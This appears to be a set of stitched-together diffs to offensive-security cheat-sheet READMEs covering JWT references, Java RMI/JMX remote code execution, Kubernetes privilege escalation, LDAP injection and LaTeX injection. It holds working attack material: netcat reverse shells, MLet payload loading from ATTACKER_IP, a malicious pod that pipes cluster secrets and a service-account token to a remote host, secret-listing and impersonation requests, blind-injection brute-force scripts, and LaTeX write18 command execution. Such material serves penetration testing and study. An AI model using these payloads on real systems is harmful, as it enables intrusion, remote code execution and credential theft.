 - [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
 - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
 - [Club EH RM 05 - Intro to JSON Web Token Exploitation - Nishacid](https://www.youtube.com/watch?v=d7wmUz57Nlg)
 - [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
 - [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
 - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://web.archive.org/web/20220305042224/https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
 - [Hacking JSON Web Tokens - medium.com Oct 2019](https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a)
 - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
 - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
+- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
 - [JSON Web Token Vulnerabilities - 0xn3va](https://0xn3va.gitbook.io/cheat-sheets/web-application/json-web-token-vulnerabilities)
 - [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
 - [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens)
 - [Privilege Escalation like a Boss - October 27, 2018 - janijay007](https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
 - [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
 - [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
 - [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](https://web.archive.org/web/20210512205928/https://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
--- a/RMI/README.md
+++ b/RMI/README.md
@@ -0,0 +1,141 @@
 # Java RMI
 > Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing.
 ## Summary
 * [Tools](#tools)
 * [Detection](#detection)
 * [Exploitation](#exploitation)
  * [RCE using beanshooter](#rce-using-beanshooter)
  * [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
  * [RCE using Metasploit](#rce-using-metasploit)
 * [References](#references)
 ## Tools
 - [siberas/sjet](https://github.com/siberas/sjet)
 - [mogwailabs/mjet](https://github.com/mogwailabs/mjet)
 - [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
 - [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
 ## Detection
 * Using [nmap](https://nmap.org/):
  ```powershell
  $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
  1089/tcp open  java-rmi Java RMI
  | rmi-vuln-classloader:
  |   VULNERABLE:
  |   RMI registry default configuration remote code execution vulnerability
  |     State: VULNERABLE
  |       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
  | rmi-dumpregistry:
  |   jmxrmi
  |     javax.management.remote.rmi.RMIServerImpl_Stub
  ```
 * Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
  ```bash
  $ rmg scan 172.17.0.2 --ports 0-65535
  [+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
  [+] 	[HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC)
  [+] 	[HIT] Found RMI service(s) on 172.17.0.2:1090  (Registry, DGC)
  [+] 	[HIT] Found RMI service(s) on 172.17.0.2:9010  (Registry, Activator, DGC)
  [+] 	[6234 / 6234] [#############################] 100%
  [+] Portscan finished.
  $ rmg enum 172.17.0.2 9010
  [+] RMI registry bound names:
  [+]
  [+] 	- plain-server2
  [+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
  [+] 		    Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
  [+] 	- legacy-service
  [+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
  [+] 		    Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
  [+] 	- plain-server
  [+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
  [+] 		    Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]
  [...]
  ```
 * Using Metasploit
  ```bash
  use auxiliary/scanner/misc/java_rmi_server
  set RHOSTS <IPs>
  set RPORT <PORT>
  run
  ```
 ## Exploitation
 If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.
 ### RCE using beanshooter
 * List available attributes: `beanshooter info 172.17.0.2 9010`
 * Display value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose`
 * Set the value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean`
 * Bruteforce a password protected JMX service: `beanshooter brute 172.17.0.2 1090`
 * List registered MBeans: `beanshooter list 172.17.0.2 9010`
 * Deploy an MBean: `beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000`
 * Enumerate JMX endpoint: `beanshooter enum 172.17.0.2 1090`
 * Invoke method on a JMX endpoint: `beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'`
 * Invoke arbitrary public and static Java methods: 
  ```ps1
  beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
  beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
  ```
 * Standard MBean execution: `beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'`
 * Deserialization attacks on a JMX endpoint: `beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin`
 ### RCE using sjet or mjet
 #### Requirements
 - Jython
 - The JMX server can connect to a http service that is controlled by the attacker
 - JMX authentication is not enabled
 #### Remote Command Execution
 The attack involves the following steps:
 * Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
 * Creating a instance of the MBean `javax.management.loading.MLet` on the target server, using JMX
 * Invoking the `getMBeansFromURL` method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file.
 * The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX.
 * The attacker finally invokes methods from the malicious MBean.
 Exploit the JMX using [siberas/sjet](https://github.com/siberas/sjet) or [mogwailabs/mjet](https://github.com/mogwailabs/mjet)
 ```powershell
 jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
 jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la"
 jython sjet.py TARGET_IP TARGET_PORT super_secret shell
 jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
 jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall
 jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"
 jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
 jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
 jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
 ```
 ### RCE using Metasploit
 ```bash
 use exploit/multi/misc/java_rmi_server
 set RHOSTS <IPs>
 set RPORT <PORT>
 # configure also the payload if needed
 run
 ```
 ## References
 * [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
 * [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security, 26 March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
 * [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel, 15 August 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)
--- a/Kubernetes/README.md
+++ b/Kubernetes/README.md
@@ -0,0 +1,303 @@
 # Kubernetes
 > Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation.
 ## Summary 
 - [Tools](#tools)
 - [Container Environment](#container-environment)
 - [Information Gathering](#information-gathering)
 - [RBAC Configuration](#rbac-configuration)
    - [Listing Secrets](#listing-secrets)
    - [Access Any Resource or Verb](#access-any-resource-or-verb)
    - [Pod Creation](#pod-creation)
    - [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
    - [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
    - [Impersonating a Privileged Account](#impersonating-a-privileged-account)
 - [Privileged Service Account Token](#privileged-service-account-token)
 - [Interesting endpoints to reach](#interesting-endpoints-to-reach)
 - [API addresses that you should know](#api-addresses-that-you-should-know)
 - [References](#references)
 ## Tools
 * [kubeaudit](https://github.com/Shopify/kubeaudit) - Audit Kubernetes clusters against common security concerns
 * [kubesec.io](https://kubesec.io/) - Security risk analysis for Kubernetes resources
 * [kube-bench](https://github.com/aquasecurity/kube-bench) - Checks whether Kubernetes is deployed securely by running [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/)
 * [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Hunt for security weaknesses in Kubernetes clusters 
 * [katacoda](https://katacoda.com/courses/kubernetes) - Learn Kubernetes using interactive broser-based scenarios
 * [kubescape](https://github.com/armosec/kubescape) - Automate Kubernetes cluster scans to identify security issues
 ## Container Environment
 Containers within a Kubernetes cluster automatically have certain information made available to them through their [container environment](https://kubernetes.io/docs/concepts/containers/container-environment/). Additional information may have been made available through the volumes, environment variables, or the downward API, but this section covers only what is made available by default.
 ### Service Account
 Each Kubernetes pod is assigned a service account for accessing the Kubernetes API. The service account, in addition to the current namespace and Kubernetes SSL certificate, are made available via a mounted read-only volume:
 ```
 /var/run/secrets/kubernetes.io/serviceaccount/token
 /var/run/secrets/kubernetes.io/serviceaccount/namespace
 /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
 ```
 If the `kubectl` utility is installed in the container, it will use this service account automatically and will make interacting with the cluster much easier. If not, the contents of the `token` and `namespace` files can be used to make HTTP API requests directly.
 ### Environment Variables
 The `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` environment variables are automatically provided to the container. They contain the IP address and port number of the Kubernetes master node.  If `kubectl` is installed, it will use these values automatically. If not, the values can be used to determine the correct IP address to send API requests to.
 ```
 KUBERNETES_SERVICE_HOST=192.168.154.228
 KUBERNETES_SERVICE_PORT=443
 ```
 Additionally, [environment variables](https://kubernetes.io/docs/concepts/services-networking/service/#discovering-services) are automatically created for each Kubernetes service running in the current namespace when the container was created.  The environment variables are named using two patterns:
 - A simplified `{SVCNAME}_SERVICE_HOST` and `{SVCNAME}_SERVICE_PORT` contain the IP address and default port number for the service.
 - A [Docker links](https://docs.docker.com/network/links/#environment-variables) collection of variables named `{SVCNAME}_PORT_{NUM}_{PROTOCOL}_{PROTO|PORT|ADDR}` for each port the service exposes.
 For example, all of the following environment variables would be available if a `redis-master` service were running with port 6379 exposed:
 ```
 REDIS_MASTER_SERVICE_HOST=10.0.0.11
 REDIS_MASTER_SERVICE_PORT=6379
 REDIS_MASTER_PORT=tcp://10.0.0.11:6379
 REDIS_MASTER_PORT_6379_TCP=tcp://10.0.0.11:6379
 REDIS_MASTER_PORT_6379_TCP_PROTO=tcp
 REDIS_MASTER_PORT_6379_TCP_PORT=6379
 REDIS_MASTER_PORT_6379_TCP_ADDR=10.0.0.11
 ```
 ### Simulating `kubectl` API Requests
 Most containers within a Kubernetes cluster won't have the `kubectl` utility installed. If running the [one-line `kubectl` installer](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) within the container isn't an option, you may need to craft Kubernetes HTTP API requests manually. This can be done by using `kubectl` *locally* to determine the correct API request to send from the container.
 1. Run the desired command at the maximum verbosity level using `kubectl -v9 ...`
 1. The output will include HTTP API endpoint URL, the request body, and an example curl command.
 1. Replace the endpoint URL's hostname and port with the `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT` values from the container's environment variables.
 1. Replace the masked "Authorization: Bearer" token value with the contents of `/var/run/secrets/kubernetes.io/serviceaccount/token` from the container.
 1. If the request had a body, ensure the "Content-Type: application/json" header is included and send the request body using the customary method (for curl, use the `--data` flag).
 For example, this output was used to create the [Service Account Permissions](#service-account-permissions) request:
 ```powershell
 # NOTE: only the Authorization and Content-Type headers are required. The rest can be omitted.
 $ kubectl -v9 auth can-i --list
 I1028 18:58:38.192352   76118 loader.go:359] Config loaded from file /home/example/.kube/config
 I1028 18:58:38.193847   76118 request.go:942] Request Body: {"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","metadata":{"creationTimestamp":null},"spec":{"namespace":"default"},"status":{"resourceRules":null,"nonResourceRules":null,"incomplete":false}}
 I1028 18:58:38.193912   76118 round_trippers.go:419] curl -k -v -XPOST  -H "Accept: application/json, */*" -H "Content-Type: application/json" -H "User-Agent: kubectl/v1.14.10 (linux/amd64) kubernetes/f5757a1" 'https://1.2.3.4:5678/apis/authorization.k8s.io/v1/selfsubjectrulesreviews'
 I1028 18:58:38.295722   76118 round_trippers.go:438] POST https://1.2.3.4:5678/apis/authorization.k8s.io/v1/selfsubjectrulesreviews 201 Created in 101 milliseconds
 I1028 18:58:38.295760   76118 round_trippers.go:444] Response Headers:
 ...
 ```
 ## Information Gathering
 ### Service Account Permissions
 The default service account may have been granted additional permissions that make cluster compromise or lateral movement easier.  
 The following can be used to determine the service account's permissions:
 ```powershell
 # Namespace-level permissions using kubectl
 kubectl auth can-i --list
 # Cluster-level permissions using kubectl
 kubectl auth can-i --list --namespace=kube-system
 # Permissions list using curl
 NAMESPACE=$(cat "/var/run/secrets/kubernetes.io/serviceaccount/namespace")
 # For cluster-level, use NAMESPACE="kube-system" instead
 MASTER_URL="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"
 TOKEN=$(cat "/var/run/secrets/kubernetes.io/serviceaccount/token")
 curl "${MASTER_URL}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
  --cacert "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt" \
  --header "Authorization: Bearer ${TOKEN}" \
  --header "Content-Type: application/json" \
  --data '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"'${NAMESPACE}'"}}'
 ```
 ### Secrets, ConfigMaps, and Volumes
 Kubernetes provides Secrets and ConfigMaps as a way to load configuration into containers at runtime. While they may not lead directly to whole cluster compromise, the information they contain can lead to individual service compromise or enable lateral movement within a cluster.
 From a container perspective, Kubernetes Secrets and ConfigMaps are identical. Both can be loaded into environment variables or mounted as volumes. It's not possible to determine if an environment variable was loaded from a Secret/ConfigMap, so each environment variable will need to be manually inspected. When mounted as a volume, Secrets/ConfigMaps are always mounted as read-only tmpfs filesystems. You can quickly find these with `grep -F "tmpfs ro" /etc/mtab`.
 True Kubernetes Volumes are typically used as shared storage or for persistent storage across restarts. These are typically mounted as ext4 filesystems and can be identified with `grep -wF "ext4" /etc/mtab`.
 ### Privileged Containers
 Kubernetes supports a wide range of [security contexts](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) for container and pod execution. The most important of these is the "privileged" [security policy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) which makes the host node's devices available under the container's `/dev` directory. This means having access to the host's Docker socket file (allowing arbitrary container actions) in addition to the host's root disks (which can be used to escape the container entirely).
 While there is no official way to check for privileged mode from *within* a container, checking if `/dev/kmsg` exists will usually suffice.
 ## RBAC Configuration
 ### Listing Secrets
 An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace.
 ```powershell
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
 ```
 ### Access Any Resource or Verb
 ```powershell
 resources:
 - '*'
 verbs:
 - '*'
 ```
 ### Pod Creation
 Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`.
 Then create a malicious pod.yaml file.
 ```yaml
 apiVersion: v1
 kind: Pod
 metadata:
  name: alpine
  namespace: kube-system
 spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
  serviceAccountName: bootstrap-signer
  automountServiceAccountToken: true
  hostNetwork: true
 ```
 Then `kubectl apply -f malicious-pod.yaml`
 ### Privilege to Use Pods/Exec
 ```powershell
 kubectl exec -it <POD NAME> -n <PODS NAMESPACE> –- sh
 ```
 ### Privilege to Get/Patch Rolebindings
 The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account. 
 Create a malicious RoleBinging.json file.
 ```powershell
 {
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "RoleBinding",
    "metadata": {
        "name": "malicious-rolebinding",
        "namespcaes": "default"
    },
    "roleRef": {
        "apiGroup": "*",
        "kind": "ClusterRole",
        "name": "admin"
    },
    "subjects": [
        {
            "kind": "ServiceAccount",
            "name": "sa-comp"
            "namespace": "default"
        }
    ]
 }
 ```
 ```powershell
 curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json
 curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Content-Type: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secret
 ```
 ### Impersonating a Privileged Account
 ```powershell
 curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
 ```
 ## Privileged Service Account Token
 ```powershell
 $ cat /run/secrets/kubernetes.io/serviceaccount/token
 $ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
 ```
 ## Interesting endpoints to reach
 ```powershell
 # List Pods
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
 # List secrets
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
 # List deployments
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
 # List daemonsets
 curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
 ```
 ## API addresses that you should know 
 *(External network visibility)*
 ### cAdvisor
 ```powershell
 curl -k https://<IP Address>:4194
 ```
 ### Insecure API server
 ```powershell
 curl -k https://<IP Address>:8080
 ```
 ### Secure API Server
 ```powershell
 curl -k https://<IP Address>:(8|6)443/swaggerapi
 curl -k https://<IP Address>:(8|6)443/healthz
 curl -k https://<IP Address>:(8|6)443/api/v1
 ```
 ### etcd API
 ```powershell
 curl -k https://<IP address>:2379
 curl -k https://<IP address>:2379/version
 etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
 ```
 ### Kubelet API
 ```powershell
 curl -k https://<IP address>:10250
 curl -k https://<IP address>:10250/metrics
 curl -k https://<IP address>:10250/pods
 ```
 ### kubelet (Read only)
 ```powershell
 curl -k https://<IP Address>:10255
 http://<external-IP>:10255/pods
 ```
 ## References
 - [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
 - [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2)
 - [Kubernetes Pentest Methodology Part 3 - by Or Ida on November 21, 2019](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3)
 - [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0)
 - [Kubernetes Pod Privilege Escalation](https://labs.bishopfox.com/tech-blog/bad-pods-kubernetes-pod-privilege-escalation)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -1,6 +1,17 @@
-# LDAP injection
+# LDAP Injection
-LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
+> LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
 ## Summary
 * [Exploitation](#exploitation)
 * [Payloads](#payloads)
 * [Blind Exploitation](#blind-exploitation)
 * [Defaults attributes](#defaults-attributes)
 * [Exploiting userPassword attribute](#exploiting-userpassword-attribute)
 * [Scripts](#scripts)
  * [Discover valid LDAP fields](#discover-valid-ldap-fields)
  * [Special blind LDAP injection](#special-blind-ldap-injection)
 ## Exploitation
@@ -9,7 +20,7 @@ Example 1.
 ```sql
 user  = *)(uid=*))(|(uid=*
 pass  = password
-query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
+query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
 ```
 Example 2
@@ -96,9 +107,91 @@ userPassword:2.5.13.18:=\xx\xx
 userPassword:2.5.13.18:=\xx\xx\xx
 ```
 ## Scripts
 ### Discover valid LDAP fields
 ```python
 #!/usr/bin/python3
 import requests
 import string
 fields = []
 url = 'https://URL.com/'
 f = open('dic', 'r') #Open the wordlists of common attributes
 wordl = f.read().split('\n')
 f.close()
 for i in wordl:
    r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
    if 'TRUE CONDITION' in r.text:
        fields.append(str(i))
 print(fields)
 ```
 Ref. [5][5]
 ### Special blind LDAP injection (without "*")
 ```python
 #!/usr/bin/python3
 import requests, string
 alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
 flag = ""
 for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break
 ```
 Ref. [5][5]
 ```ruby
 #!/usr/bin/env ruby
 require 'net/http'
 alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
 flag = ''
 (0..50).each do |i|
  puts("[i] Looking for number #{i}")
  alphabet.each do |char|
    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
    if /TRUE CONDITION/.match?(r)
      flag += char
      puts("[+] Flag: #{flag}")
      break
    end
  end
 end
 ```
 By [noraj](https://github.com/noraj)
 ## References
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
-* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
+* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/writeupecw2018admyssion/)
-* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
+* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
 * [How To Manage and Use LDAP Servers with OpenLDAP Utilities](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
 * [How To Configure OpenLDAP and Perform Administrative LDAP Tasks](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
 * SSH key authentication via LDAP
    - [How to setup LDAP server for openssh-lpk](https://openssh-ldap-pubkey.readthedocs.io/en/latest/openldap.html)
    - [openssh-lpk.ldif](https://github.com/Lullabot/openldap-schema/blob/master/openssh-lpk.ldif)
    - [Setting up OpenLDAP server with OpenSSH-LPK on Ubuntu 14.04](https://blog.shichao.io/2015/04/17/setup_openldap_server_with_openssh_lpk_on_ubuntu.html)
    - [SSH key authentication using LDAP](https://serverfault.com/questions/653792/ssh-key-authentication-using-ldap)
    - [FR] [SSH et LDAP](https://wiki.lereset.org/ateliers:serveurmail:ldap-ssh)
    - [SSH Public Keys in OpenLDAP](http://pig.made-it.com/ldap-openssh.html)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -1,15 +1,19 @@
 # LaTex Injection
 You might need to adjust injection with wrappers as `\[` or `$`.
 ## Read file
-```bash
+Read file and interpret the LaTeX code in it:
 ```tex
 \input{/etc/passwd}
-\include{password} # load .tex file
+\include{somefile} # load .tex file (somefile.tex)
 ```
-Read single lined file
+Read single lined file:
-```bash
+```tex
 \newread\file
 \openin\file=/etc/issue
 \read\file to\line
@@ -17,9 +21,10 @@ Read single lined file
 \closein\file
 ```
-Read multiple lined file
+Read multiple lined file:
-```bash
+```tex
 \lstinputlisting{/etc/passwd}
 \newread\file
 \openin\file=/etc/passwd
 \loop\unless\ifeof\file
@@ -29,47 +34,72 @@ Read multiple lined file
 \closein\file
 ```
-Read text file, keep the formatting
+Read text file, **without** interpreting the content, it will only paste raw file content:
-```bash
+```tex
 \usepackage{verbatim}
 \verbatiminput{/etc/passwd}
 ```
 If injection point is past document header (`\usepackage` cannot be used), some control 
 characters can be deactivated in order to use `\input` on file containing `$`, `#`, 
 `_`, `&`, null bytes, ... (eg. perl scripts).
 ```tex
 \catcode `\$=12
 \catcode `\#=12
 \catcode `\_=12
 \catcode `\&=12
 \input{path_to_script.pl}
 ```
 To bypass a blacklist try to replace one character with it's unicode hex value. 
 - ^^41 represents a capital A
 - ^^7e represents a tilde (~) note that the ‘e’ must be lower case
 ```tex
 \lstin^^70utlisting{/etc/passwd}
 ```
 ## Write file
-```bash
+Write single lined file:
 ```tex
 \newwrite\outfile
 \openout\outfile=cmd.tex
 \write\outfile{Hello-world}
 \write\outfile{Line 2}
 \write\outfile{I like trains}
 \closeout\outfile
 ```
 ## Command execution
-The input of the command will be redirected to stdin, use a temp file to get it.
+The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
-```bash
+```tex
-\immediate\write18{env > output}
+\immediate\write18{id > output}
 \input{output}
 ```
-If you get any LaTex error, consider using base64 to get the result without bad characters
+If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
-```bash
+```tex
 \immediate\write18{env | base64 > test.tex}
 \input{text.tex}
 ```
-```bash
+```tex
-\input|ls|base4
+\input|ls|base64
 \input{|"/bin/hostname"}
 ```
 ## Cross Site Scripting
 From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) 
-```bash
+
 ```tex
 \url{javascript:alert(1)}
 \href{javascript:alert(1)}{placeholder}
 ```
@@ -80,4 +110,4 @@ Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{
 * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
 * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
-* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
+* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
--- a/Assignment/README.md
+++ b/Assignment/README.md
@@ -0,0 +1,42 @@
 # Mass Assignment
 > A mass assignment attack is a security vulnerability that occurs when a web application automatically assigns user-supplied input values to properties or variables of a program object. This can become an issue if a user is able to modify attributes they should not have access to, like a user's permissions or an admin flag.
 ## Summary
 * [Exploit](#exploit)
 * [Labs](#labs)
 * [References](#references)
 ## Exploit
